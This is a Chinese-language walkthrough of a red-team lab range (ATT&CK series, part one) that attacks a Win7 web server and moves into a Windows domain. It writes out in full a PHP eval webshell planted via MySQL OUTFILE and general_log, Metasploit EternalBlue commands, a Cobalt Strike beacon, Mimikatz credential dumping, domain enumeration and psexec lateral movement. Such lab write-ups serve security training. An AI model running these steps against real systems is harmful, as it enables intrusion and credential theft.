ATT&CK实战系列 红队实战(一)

1. 环境搭建

1.1 靶机下载

百度网盘: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
密码为:n1u2。
开机密码:hongrisec@2019

1.2 网络拓扑及IP规划

​ 下载包中的VM1为win7,VM2为win2003,VM3为win2008,拓扑图为下图所示:

0

1
2
3
4
5
6
7
8
9
10
win 7(VM1):
外网ip:192.168.44.131
内网ip:192.168.88.143
关闭域防火墙
开启phpstudy
win2003(VM2):
内网ip:192.168.88.141
win2008(VM3):
内网ip:192.168.88.138
关闭防火墙

​ 内网中的win 7、win2003、win2008能够互相ping通。

2. win 7渗透(VM1)

2.1 信息收集

1)使用nmap扫描本网段存活主机。

1
nmap -sS -sV -O 192.168.44.0/24

image-20200825102051387

2)得到192.168.44.131主机并开启了80端口,通过访问得到服务器版本、物理路径等敏感信息。

image-20200825102901271

3)进行目录扫描。

1
dirb http://192.168.44.131

4)再使用御剑进行扫描,

image-20200825104554719

得到/phpmyadmin/ beifen.rar 等一些敏感目录。

2.2 漏洞利用

1)下载beifen.rar 网站备份文件,查找关键信息,得到数据库的连接用户名密码。

image-20200825110115423

2)访问/phpmyadmin ,使用获取的用户名密码进行登录,成功进入。

image-20200825110423084

3)可使用sql写入一句话,写入失败。

1
SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE C:/phpstudy/WWW/joker.php;

image-20200825110948894

4)查看secure-file-priv 是否为空,很可惜,值为NULL,无法写入一句话。

1
SHOW VARIABLES LIKE "secure_file_priv"

image-20200825111054954

5)转换思路,利⽤ log ⽇志插⼊⼀句话,首先查看日志是否开启。

1
show variables like '%general%';

image-20200825111814209

6)开启general_log将所有查询语句记录到新指定的可访问的文件中。

1
set global general_log="ON";

image-20200825112229269

1
set global general_log_file='C:/phpStudy/WWW/joker.php';

image-20200825112349936

7)查询一句话写入我们指定的新文件中。

1
select "<?php eval($_POST[cmd]);?>";

image-20200825112815425

8)菜刀连接。

image-20200825131954992

2.3 其他漏洞利用

1
2
3
4
1)后台弱口令
2)mysql、phpmyadmin弱口令
3)留言板存储型xss
4)后台修改模板处任意文件读写

​ 其他的不做累述。具体可看yxcms漏洞分析。

2.4 445端⼝(ms17_010)漏洞

1)开启msf,尝试永恒之蓝。

1
2
msfconsole
search ms17_010

image-20200825163056373

2)验证漏洞存在与否。

1
2
3
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.44.131
run

image-20200825164940676

3)利用漏洞反弹shell

1
2
3
4
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.44.131
show options
run

image-20200825165523015

​ getshell成功,并直接提权成system。

3.内网渗透

3.1 信息收集

​ 拿下web服务器之后可以上传一个cs马,win7执行后,cs服务端上线主机。

image-20200902144954719

3.1.1 minikatz获取账号密码

​ 使用Mimikatz跑⼀下

image-20200902145609561

​ 得到账户:Administrator 密码:hongrisec@2020

image-20200902145542840

3.1.2 基本信息收集

​ 一些常用命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
net time /domain        #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain #查看域用户
net view /domain #查看有几个域
ipconfig /all       #查询本机IP段,所在域等
net config Workstation #当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user         #本机用户列表
net group "domain computers" /domain #查看域内所有的主机名
net group "domain admins" /domain #查看域管理员
net group "domain controllers" /domain #查看域控
net localhroup administrators #本机管理员[通常含有域用户]
net user 用户名 /domain #获取指定用户的账户信息
net group /domain #查询域里面的工作组
net group 组名 /domain #查询域中的某工作组

3.1.3 内网主机存活和端口扫描

​ 可以使用cs进行一波内网主机存活和端口的扫描。

image-20200902153850150

​ 选择内网ip对应的网段。

image-20200902153918336

​ 同时也可以使用命令进行扫描:

1
portscan 192.168.44.0/24 1-1024,3389,5900-6000

​ 得到存活的主机ip和开放的端口

image-20200902154741262

3.2 横向移动

​ 添加Pivotting Listener

image-20200902172235950

​ 箭头所指填内网ip

image-20200902172320616

​ 然后新建⼀个 psexec 程序

image-20200902172456250

​ 选择相应的监听器和Session

image-20200902172655309

​ 成功连上

image-20200902172721638

0%